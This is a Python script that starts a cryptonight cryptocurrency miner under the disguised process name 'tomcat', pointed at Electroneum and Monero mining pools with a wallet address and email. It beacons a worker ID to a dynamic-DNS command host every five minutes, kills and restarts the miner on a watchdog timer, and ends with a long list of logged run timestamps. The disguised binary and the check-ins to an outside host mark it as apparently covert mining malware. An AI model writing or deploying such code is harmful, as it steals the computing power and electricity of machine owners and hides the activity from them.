import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:04.199046
#2018-02-17 16:06:02.072085
#2018-02-17 17:53:07.088250
#2018-02-17 19:42:06.263222
#2018-02-17 21:31:06.523872
#2018-02-17 23:15:08.299873
#2018-02-18 01:01:07.849012
#2018-02-18 02:49:03.667680
#2018-02-18 04:38:06.720977
#2018-02-18 06:29:05.031520
#2018-02-18 08:17:07.195891
#2018-02-18 10:05:04.062136
#2018-02-18 11:51:03.639887
#2018-02-18 13:36:06.479505
#2018-02-18 15:26:06.230405
#2018-02-18 17:15:02.572209
#2018-02-18 19:02:06.094151
#2018-02-18 20:49:04.826364
#2018-02-18 22:33:07.659250
#2018-02-19 00:21:05.578780
#2018-02-19 02:08:05.444794
#2018-02-19 03:54:06.738946
#2018-02-19 05:39:06.156556
#2018-02-19 07:27:07.324305
#2018-02-19 09:17:01.792337
#2018-02-19 11:06:07.089930
#2018-02-19 12:53:07.188936
#2018-02-19 14:41:08.628248
#2018-02-19 16:29:01.240632
#2018-02-19 18:15:02.944487
#2018-02-19 20:03:05.891097
#2018-02-19 21:53:05.365412
#2018-02-19 23:39:03.412183
#2018-02-20 01:26:01.311056
#2018-02-20 03:15:04.623072
#2018-02-20 05:03:06.248301
#2018-02-20 06:46:04.140614
#2018-02-20 08:33:01.727517
#2018-02-20 10:17:04.654505
#2018-02-20 12:02:05.951557
#2018-02-20 13:50:02.763345
#2018-02-20 15:27:07.150368
#2018-02-20 17:12:09.679568
#2018-02-20 19:02:09.262888
#2018-02-20 20:52:04.178173
#2018-02-20 22:38:02.015109
#2018-02-21 00:19:02.263978
#2018-02-21 02:05:06.680420
#2018-02-21 03:52:05.696013
#2018-02-21 05:41:01.955303
#2018-02-21 07:29:06.520014
#2018-02-21 09:13:06.661464
#2018-02-21 11:02:09.568728
#2018-02-21 12:49:10.646172
#2018-02-21 14:37:07.743173
#2018-02-21 16:25:05.756945
#2018-02-21 18:16:09.734487
#2018-02-21 20:02:08.424191
#2018-02-21 21:51:01.620994
#2018-02-21 23:37:01.465053
#2018-02-22 01:25:06.315162
#2018-02-22 03:13:05.915870
#2018-02-22 04:59:05.893435
#2018-02-22 06:43:06.941800
#2018-02-22 08:32:07.117811
#2018-02-22 10:19:01.342145
#2018-02-22 12:06:13.533465
#2018-02-22 13:51:09.540420
#2018-02-22 15:39:08.453959
#2018-02-22 17:25:09.058483
#2018-02-22 19:12:04.202034
#2018-02-22 21:04:06.579582
#2018-02-22 22:50:08.401282
#2018-02-23 00:37:03.634165
#2018-02-23 02:23:05.403359
#2018-02-23 04:13:04.198486
#2018-02-23 05:59:04.960150
#2018-02-23 07:33:05.932479
#2018-02-23 09:35:10.078481
#2018-02-23 11:17:08.561284
#2018-02-23 12:38:01.399321
#2018-02-23 14:04:02.076938
#2018-02-23 15:41:01.530191
#2018-02-23 17:11:07.969841
#2018-02-23 18:46:07.181213
#2018-02-23 20:19:04.309419
#2018-02-23 21:57:04.248368
#2018-02-23 23:31:04.011787
#2018-02-24 00:58:05.676984
#2018-02-24 02:45:01.448187
#2018-02-24 04:36:07.154248
#2018-02-24 06:20:08.681199
#2018-02-24 08:08:03.477368
#2018-02-24 09:52:01.939050
#2018-02-24 11:46:05.377113
#2018-02-24 13:36:05.648559
#2018-02-24 15:23:04.857012
#2018-02-24 17:13:05.930455
#2018-02-24 19:04:06.809635
#2018-02-24 20:52:05.061928
#2018-02-24 23:17:07.453418
#2018-02-25 02:42:03.273907
#2018-02-25 06:22:04.885070
#2018-02-25 11:39:01.930332